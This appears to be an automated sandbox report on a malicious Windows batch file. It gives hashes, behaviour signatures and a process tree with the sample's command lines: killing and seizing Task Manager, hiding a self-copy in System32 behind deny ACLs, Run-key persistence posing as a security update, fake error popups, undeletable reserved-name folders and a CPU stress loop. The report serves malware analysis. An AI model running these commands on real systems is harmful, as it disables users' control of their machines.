Resubmissions

28/03/2025, 23:13

250328-27d4aavpy6 8

28/03/2025, 23:11

250328-26lrqsvpx2 8

Analysis

  • max time kernel
    0s
  • max time network
    3s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags
    arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  • submitted
    28/03/2025, 23:13

General

  • Target
    mainversion.bat
  • Size
    3KB
  • MD5
    97422af7164bd8af68e3ff991ed685a5
  • SHA1
    46f9d4c9eb4be48b0579d9b5ce01ef0fed7cf3e4
  • SHA256
    3e45ddc08bb9c1604b399fd5e43546877bc0c290df087dd2697816b8eeadabaf
  • SHA512
    72a36da2099eb75da04bd0df431a67d2447eb25179339c6772946d64bc8fe1d4fc9b6fee5c43a18724baf4026c8fc8bd6e280c05d6216944be77892b876ea15e

Malware Config

Signatures

  • Possible privilege escalation attempt 23 IoCs
  • Sets file to hidden 1 TTPs 3 IoCs

    Modifies file attributes to stop it showing in Explorer etc.

  • Drops startup file 1 IoCs
  • Modifies file permissions 1 TTPs 23 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Drops file in System32 directory 5 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Delays execution with timeout.exe 1 IoCs
  • Kills process with taskkill 2 IoCs
  • Opens file in notepad (likely ransom note) 2 IoCs
  • Runs net.exe
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 3 IoCs

Processes

Each entry gives the image path with its PID and tree depth, the command line, and the signatures the sandbox attached to that process; children are indented under their parent.

  • C:\Windows\system32\cmd.exe (PID 1156, depth 1)
    cmd /c "C:\Users\Admin\AppData\Local\Temp\mainversion.bat"
    Signatures: Drops startup file; Drops file in System32 directory; Suspicious use of WriteProcessMemory
    • C:\Windows\system32\msg.exe (PID 1660, depth 2)
      msg * "Fatal Error: Something unusual has occured. Maybe try restarting your PC?"
    • C:\Windows\system32\net.exe (PID 2288, depth 2)
      net session
      Signatures: Suspicious use of WriteProcessMemory
      • C:\Windows\system32\net1.exe (PID 1872, depth 3)
        C:\Windows\system32\net1 session
    • C:\Windows\system32\taskkill.exe (PID 3040, depth 2)
      taskkill /f /im taskmgr.exe
      Signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
    • C:\Windows\system32\takeown.exe (PID 2868, depth 2)
      takeown /f C:\Windows\System32\taskmgr.exe
      Signatures: Possible privilege escalation attempt; Modifies file permissions; Suspicious use of AdjustPrivilegeToken
    • C:\Windows\system32\takeown.exe (PID 700, depth 2)
      takeown /f C:\Windows\SysWOW64\taskmgr.exe
      Signatures: Possible privilege escalation attempt; Modifies file permissions; Suspicious use of AdjustPrivilegeToken
    • C:\Windows\system32\icacls.exe (PID 2680, depth 2)
      icacls C:\Windows\System32\taskmgr.exe /grant administrators:F
      Signatures: Possible privilege escalation attempt; Modifies file permissions
    • C:\Windows\system32\icacls.exe (PID 2740, depth 2)
      icacls C:\Windows\SysWOW64\taskmgr.exe /grant administrators:F
      Signatures: Possible privilege escalation attempt; Modifies file permissions
    • C:\Windows\system32\attrib.exe (PID 2820, depth 2)
      attrib +s +h +r "C:\Windows\System32\flare.bat"
      Signatures: Sets file to hidden; Drops file in System32 directory; Views/modifies file attributes
    • C:\Windows\system32\icacls.exe (PID 2728, depth 2)
      icacls "C:\Windows\System32\flare.bat" /deny Everyone:(F)
      Signatures: Possible privilege escalation attempt; Modifies file permissions
    • C:\Windows\system32\icacls.exe (PID 2660, depth 2)
      icacls "C:\Windows\System32\flare.bat" /deny SYSTEM:(F)
      Signatures: Possible privilege escalation attempt; Modifies file permissions
    • C:\Windows\system32\icacls.exe (PID 756, depth 2)
      icacls "C:\Windows\System32\flare.bat" /deny Administrators:(F)
      Signatures: Possible privilege escalation attempt; Modifies file permissions
    • C:\Windows\system32\reg.exe (PID 2112, depth 2)
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Security Update" /t REG_SZ /d "C:\Windows\System32\flare.bat" /f
      Signatures: Adds Run key to start application
    • C:\Windows\system32\cmd.exe (PID 2988, depth 2)
      cmd.exe
    • C:\Windows\system32\notepad.exe (PID 2692, depth 2)
      notepad "C:\Users\Admin\Desktop\flare_warning.txt"
      Signatures: Opens file in notepad (likely ransom note)
    • C:\Windows\system32\icacls.exe (PID 2860, depth 2)
      icacls "C:\Users\Admin\Desktop\CON" /deny Everyone:(F
      Signatures: Possible privilege escalation attempt; Modifies file permissions
    • C:\Windows\system32\icacls.exe (PID 2848, depth 2)
      icacls "C:\Users\Admin\Desktop\PRN" /deny Everyone:(F
      Signatures: Possible privilege escalation attempt; Modifies file permissions
    • C:\Windows\system32\icacls.exe (PID 2932, depth 2)
      icacls "C:\Users\Admin\Desktop\AUX" /deny Everyone:(F
      Signatures: Possible privilege escalation attempt; Modifies file permissions
    • C:\Windows\system32\icacls.exe (PID 2560, depth 2)
      icacls "C:\Users\Admin\Desktop\NUL" /deny Everyone:(F
      Signatures: Possible privilege escalation attempt; Modifies file permissions
    • C:\Windows\system32\icacls.exe (PID 2556, depth 2)
      icacls "C:\Users\Admin\Desktop\COM1" /deny Everyone:(F
      Signatures: Possible privilege escalation attempt; Modifies file permissions
    • C:\Windows\system32\icacls.exe (PID 2280, depth 2)
      icacls "C:\Users\Admin\Desktop\COM2" /deny Everyone:(F
      Signatures: Possible privilege escalation attempt; Modifies file permissions
    • C:\Windows\system32\icacls.exe (PID 2668, depth 2)
      icacls "C:\Users\Admin\Desktop\COM3" /deny Everyone:(F
      Signatures: Possible privilege escalation attempt; Modifies file permissions
    • C:\Windows\system32\icacls.exe (PID 2696, depth 2)
      icacls "C:\Users\Admin\Desktop\LPT1" /deny Everyone:(F
      Signatures: Possible privilege escalation attempt; Modifies file permissions
    • C:\Windows\system32\icacls.exe (PID 2824, depth 2)
      icacls "C:\Users\Admin\Desktop\LPT2" /deny Everyone:(F
      Signatures: Possible privilege escalation attempt; Modifies file permissions
    • C:\Windows\system32\attrib.exe (PID 2352, depth 2)
      attrib +s +h "C:\Users\Admin\Desktop\LPT2"
      Signatures: Sets file to hidden; Views/modifies file attributes
    • C:\Windows\system32\notepad.exe (PID 2536, depth 2)
      notepad "C:\Users\Admin\Desktop\LPT2\Fixes.txt"
      Signatures: Opens file in notepad (likely ransom note)
    • C:\Windows\system32\cscript.exe (PID 2548, depth 2)
      cscript //nologo C:\Users\Admin\AppData\Local\Temp\launch_hidden.vbs
      • C:\Windows\System32\cmd.exe (PID 2224, depth 3)
        "C:\Windows\System32\cmd.exe" /c start /min C:\Users\Admin\AppData\Local\Temp\mainversion.bat
        • C:\Windows\system32\cmd.exe (PID 2916, depth 4)
          C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\mainversion.bat
          • C:\Windows\system32\msg.exe (PID 2924, depth 5)
            msg * "Fatal Error: Something unusual has occured. Maybe try restarting your PC?"
          • C:\Windows\system32\net.exe (PID 1152, depth 5)
            net session
            • C:\Windows\system32\net1.exe (PID 2592, depth 6)
              C:\Windows\system32\net1 session
          • C:\Windows\system32\taskkill.exe (PID 2792, depth 5)
            taskkill /f /im taskmgr.exe
            Signatures: Kills process with taskkill
          • C:\Windows\system32\takeown.exe (PID 2948, depth 5)
            takeown /f C:\Windows\System32\taskmgr.exe
            Signatures: Possible privilege escalation attempt; Modifies file permissions
          • C:\Windows\system32\takeown.exe (PID 2800, depth 5)
            takeown /f C:\Windows\SysWOW64\taskmgr.exe
            Signatures: Possible privilege escalation attempt; Modifies file permissions
          • C:\Windows\system32\icacls.exe (PID 1976, depth 5)
            icacls C:\Windows\System32\taskmgr.exe /grant administrators:F
            Signatures: Possible privilege escalation attempt; Modifies file permissions
          • C:\Windows\system32\icacls.exe (PID 2432, depth 5)
            icacls C:\Windows\SysWOW64\taskmgr.exe /grant administrators:F
            Signatures: Possible privilege escalation attempt; Modifies file permissions
          • C:\Windows\system32\attrib.exe (PID 1724, depth 5)
            attrib +s +h +r "C:\Windows\System32\flare.bat"
            Signatures: Sets file to hidden; Views/modifies file attributes
          • C:\Windows\system32\icacls.exe (PID 2896, depth 5)
            icacls "C:\Windows\System32\flare.bat" /deny Everyone:(F)
            Signatures: Possible privilege escalation attempt; Modifies file permissions
          • C:\Windows\system32\icacls.exe (PID 1224, depth 5)
            icacls "C:\Windows\System32\flare.bat" /deny SYSTEM:(F)
            Signatures: Possible privilege escalation attempt; Modifies file permissions
          • C:\Windows\system32\icacls.exe (PID 1752, depth 5)
            icacls "C:\Windows\System32\flare.bat" /deny Administrators:(F)
            Signatures: Possible privilege escalation attempt; Modifies file permissions
          • C:\Windows\system32\reg.exe (PID 1704, depth 5)
            reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Security Update" /t REG_SZ /d "C:\Windows\System32\flare.bat" /f
    • C:\Windows\system32\cmd.exe (PID 2152, depth 2)
      cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
    • C:\Windows\system32\timeout.exe (PID 2700, depth 2)
      timeout /t 1
      Signatures: Delays execution with timeout.exe

Network

MITRE ATT&CK Enterprise v15


Downloads

  • C:\Users\Admin\AppData\Local\Temp\launch_hidden.vbs
    Filesize 142B
    MD5 a918e39e90540829b11e66ea68102b54
    SHA1 b42ac88ad6a6d4fe99460a99b286748003a5326e
    SHA256 007f1e45ce7381c2bdc57c7f4bce9be2d471dc9c76ebf520e0f7338359787435
    SHA512 08165746cae6ee71f4a0e8a268cc1b88e26b5e1ffa266905d1005ffe361d61de6b116974e2c3bbd25b8bbbe86a418968192bf28bf6013883f049a1e678c2eeb1
  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\error.bat
    Filesize 11B
    MD5 9905e5a33c6edd8eb5f59780afbf74de
    SHA1 64b2cd0186ff6fe05072ee88e2bb54476023772e
    SHA256 c134b2f85415ba5cfce3e3fe4745688335745a9bb22152ac8f5c77f190d8aee3
    SHA512 e10711d0fb09db27192e9af05ae45b83cf3882d98e904a7f1f969cf24c2f9626f70f35d76f57477fe9c64a58bc74100410740e9d506d4e72d3e2900d6277816e
  • C:\Users\Admin\Desktop\LPT2\Fixes.txt
    Filesize 36B
    MD5 9ea9c312f34cfeda8394b84c0dfd1fc9
    SHA1 d587d14e675fa07820e4a3c513285b42831c90bf
    SHA256 4bfc6d2ad894c24dcedc920096679c80c1dd4340528ba9a071cff8b9bf8ab9e7
    SHA512 0ed43563d7e3492773d30abdad9199b5cb9fd49ffb32c0c0a9cc1471545991131644b81c61f70f0f062ee9ab5314005b7677982c8074696aa832b226cd32ca8d
  • C:\Users\Admin\Desktop\flare_warning.txt
    Filesize 85B
    MD5 06f0a7e183c60d2d25359f8805ac79c8
    SHA1 88dcb58b0342aaa5d26fbcc4f331980280d8788e
    SHA256 c4ee6d94b5725af6c1ed91eb62fc34db9be62aca661976a5c24bdbb3db24e1d6
    SHA512 ee60f735fcee65e0c76a9240b660bb850f285900d5229dcf102d244e14248b24f5f102523efee659f4de6ac339fa1f554e36a712bd3209a4f3ab1897a63314b3
  • C:\Windows\System32\flare.bat (same hashes as the submitted mainversion.bat)
    Filesize 3KB
    MD5 97422af7164bd8af68e3ff991ed685a5
    SHA1 46f9d4c9eb4be48b0579d9b5ce01ef0fed7cf3e4
    SHA256 3e45ddc08bb9c1604b399fd5e43546877bc0c290df087dd2697816b8eeadabaf
    SHA512 72a36da2099eb75da04bd0df431a67d2447eb25179339c6772946d64bc8fe1d4fc9b6fee5c43a18724baf4026c8fc8bd6e280c05d6216944be77892b876ea15e